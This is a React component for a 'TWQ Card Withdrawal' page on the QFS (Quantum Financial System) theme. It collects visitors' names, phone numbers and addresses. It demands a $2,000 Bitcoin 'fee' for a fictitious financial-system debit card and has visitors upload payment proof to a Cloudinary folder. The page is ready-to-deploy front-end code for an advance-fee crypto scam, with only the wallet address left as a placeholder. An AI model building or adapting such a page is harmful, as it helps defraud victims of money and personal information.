import React, { useState } from 'react';
import { Upload, CheckCircle, Copy, Loader2 } from 'lucide-react';

export default function QfsCardWithdrawal() {
  const [formData, setFormData] = useState({
    fullName: '',
    phone: '',
    mailbox: '',
    proofUrl: '',
  });

  const [uploading, setUploading] = useState(false);
  const [submitted, setSubmitted] = useState(false);
  const [copied, setCopied] = useState(false);

  const handleChange = (e) => {
    setFormData({ ...formData, [e.target.name]: e.target.value });
  };

  // Generate safe folder name from full name + year
  const generateFolderName = () => {
    if (!formData.fullName.trim()) return 'QFS-Withdrawals/Unknown-User';

    const safeName = formData.fullName
      .trim()
      .replace(/[^a-zA-Z0-9\s-]/g, '') // Remove special chars
      .replace(/\s+/g, '-')             // Spaces → dashes
      .substring(0, 50);                // Limit length

    const year = new Date().getFullYear();
    return `QFS-Withdrawals/${safeName}-${year}`;
  };

  const uploadToCloudinary = async (e) => {
    const file = e.target.files[0];
    if (!file) return;

    // Optional: require name before uploading
    if (!formData.fullName.trim()) {
      alert('Please enter your Full Name first!');
      e.target.value = '';
      return;
    }

    setUploading(true);

    const folder = generateFolderName();

    const data = new FormData();
    data.append('file', file);
    data.append('upload_preset', 'qfsuploading'); // ← CHANGE THIS
    data.append('folder', folder); // This creates/nests the folder automatically

    // Optional: add public_id with timestamp for uniqueness
    const timestamp = Date.now();
    data.append('public_id', `proof-${timestamp}`);

    try {
      const res = await fetch(
        'https://api.cloudinary.com/v1_1/dscgg80xw/image/upload', // ← CHANGE THIS
        {
          method: 'POST',
          body: data,
        }
      );

      const json = await res.json();

      if (json.secure_url) {
        setFormData({ ...formData, proofUrl: json.secure_url });
        alert('Proof uploaded successfully!');
      } else {
        throw new Error('Upload failed');
      }
    } catch (error) {
      console.error('Upload error:', error);
      alert('Upload failed. Please try again.');
    } finally {
      setUploading(false);
    }
  };

  const handleSubmit = (e) => {
    e.preventDefault();
    if (!formData.proofUrl) {
      alert('Please upload your payment proof');
      return;
    }
    setSubmitted(true);
  };

  const copyAddress = () => {
    navigator.clipboard.writeText('1HcZyXexampleBitcoinAddress98asd87asd');
    setCopied(true);
    setTimeout(() => setCopied(false), 2000);
  };

  // Success Screen
  if (submitted) {
    return (
      <div className="min-h-screen bg-gradient-to-br from-indigo-50 via-purple-100 flex items-center justify-center p-6">
        <div className="bg-white rounded-3xl shadow-2xl p-12 max-w-md w-full text-center">
          <CheckCircle className="w-24 h-24 text-green-500 mx-auto mb-6 animate-bounce" />
          <h1 className="text-4xl font-bold text-gray-800 mb-4">Request Submitted!</h1>
          <p className="text-lg text-gray-600">Thank you, {formData.fullName.split(' ')[0]}!</p>
          <p className="mt-4 text-gray-500">Your TWQ debit card is being processed.</p>
          <p className="mt-6 text-sm text-gray-400">Proof saved in: {generateFolderName()}</p>
        </div>
      </div>
    );
  }

  return (
    <div className="min-h-screen bg-gradient-to-br from-indigo-50 via-white to-purple-50 flex items-center justify-center p-6">
      <div className="bg-white/90 backdrop-blur-xl rounded-3xl shadow-2xl p-10 w-full max-w-2xl border border-white/30">

        <div className="text-center mb-10">
          <h1 className="text-4xl font-extrabold bg-gradient-to-r from-indigo-600 to-purple-600 bg-clip-text text-transparent">
            TWQ Card Withdrawal
          </h1>
          <p className="mt-3 text-lg text-gray-600">Secure your Financial System debit card</p>
          <div className="mt-6 inline-flex items-center gap-3 bg-amber-100 text-amber-800 px-6 py-3 rounded-full font-bold">
            Fee: $2,000 (Pay via Bitcoin)
          </div>
        </div>

        <form onSubmit={handleSubmit} className="space-y-8">

          <div className="grid md:grid-cols-2 gap-6">
            <div>
              <label className="block text-sm font-semibold text-gray-700 mb-2">Full Name *</label>
              <input
                type="text"
                name="fullName"
                value={formData.fullName}
                onChange={handleChange}
                required
                className="w-full px-5 py-4 border border-gray-300 rounded-xl focus:ring-4 focus:ring-indigo-300 focus:border-indigo-500 transition"
                placeholder="John Doe"
              />
            </div>

            <div>
              <label className="block text-sm font-semibold text-gray-700 mb-2">Phone Number *</label>
              <input
                type="tel"
                name="phone"
                value={formData.phone}
                onChange={handleChange}
                required
                className="w-full px-5 py-4 border border-gray-300 rounded-xl focus:ring-4 focus:ring-indigo-300 focus:border-indigo-500 transition"
                placeholder="+1 (555)"
              />
            </div>
          </div>

          <div>
            <label className="block text-sm font-semibold text-gray-700 mb-2">Delivery Address *</label>
            <input
              type="text"
              name="mailbox"
              value={formData.mailbox}
              onChange={handleChange}
              required
              className="w-full px-5 py-4 border border-gray-300 rounded-xl focus:ring-4 focus:ring-indigo-300 focus:border-indigo-500 transition"
              placeholder="123 Quantum Ave, New York, NY"
            />
          </div>

          <div className="bg-gray-900 text-white p-8 rounded-2xl text-center">
            <p className="font-bold text-lg mb-4">Send exactly $2,000 in BTC to:</p>
            <div className="flex items-center justify-center gap-4 bg-gray-800 p-4 rounded-xl">
              <code className="text-green-400 font-mono text-sm break-all">
                1HcZyXexampleBitcoinAddress98asd87asd
              </code>
              <button
                type="button"
                onClick={copyAddress}
                className="p-3 bg-indigo-600 hover:bg-indigo-500 rounded-lg transition flex items-center gap-2 whitespace-nowrap"
              >
                {copied ? <CheckCircle className="w-5 h-5" /> : <Copy className="w-5 h-5" />}
                {copied ? 'Copied!' : 'Copy'}
              </button>
            </div>
          </div>

          <div>
            <label className="block text-sm font-semibold text-gray-700 mb-3">
              Upload Proof of Payment *
            </label>
            <label className="block w-full h-64 border-2 border-dashed border-indigo-400 rounded-2xl cursor-pointer bg-indigo-50 hover:bg-indigo-100 transition overflow-hidden">
              <input type="file" accept="image/*" onChange={uploadToCloudinary} className="hidden" />
              <div className="h-full flex flex-col items-center justify-center">
                {uploading ? (
                  <div className="text-center">
                    <Loader2 className="w-12 h-12 text-indigo-600 animate-spin mx-auto mb-4" />
                    <p className="text-indigo-700 font-medium">Uploading to {generateFolderName()}...</p>
                  </div>
                ) : formData.proofUrl ? (
                  <div className="text-center">
                    <CheckCircle className="w-16 h-16 text-green-500 mx-auto mb-4" />
                    <p className="text-green-600 font-semibold">Proof uploaded successfully!</p>
                    <img src={formData.proofUrl} alt="Proof" className="mt-4 mx-auto max-h-32 rounded-lg shadow" />
                  </div>
                ) : (
                  <>
                    <Upload className="w-12 h-12 text-indigo-500 mx-auto mb-4" />
                    <p className="text-lg text-gray-700">Click to upload proof</p>
                    <p className="text-sm text-gray-500">Will be saved in: {generateFolderName()}</p>
                  </>
                )}
              </div>
            </label>
          </div>

          <button
            type="submit"
            disabled={uploading || !formData.proofUrl}
            className="w-full py-5 bg-gradient-to-r from-indigo-600 to-purple-600 hover:from-indigo-700 hover:to-purple-700 text-white font-bold text-xl rounded-2xl shadow-xl transform transition hover:scale-105 disabled:opacity-50 disabled:cursor-not-allowed flex items-center justify-center gap-3"
          >
            {uploading ? <Loader2 className="animate-spin" /> : 'Submit Withdrawal Request'}
          </button>
        </form>

        </div>
    </div>
  );
}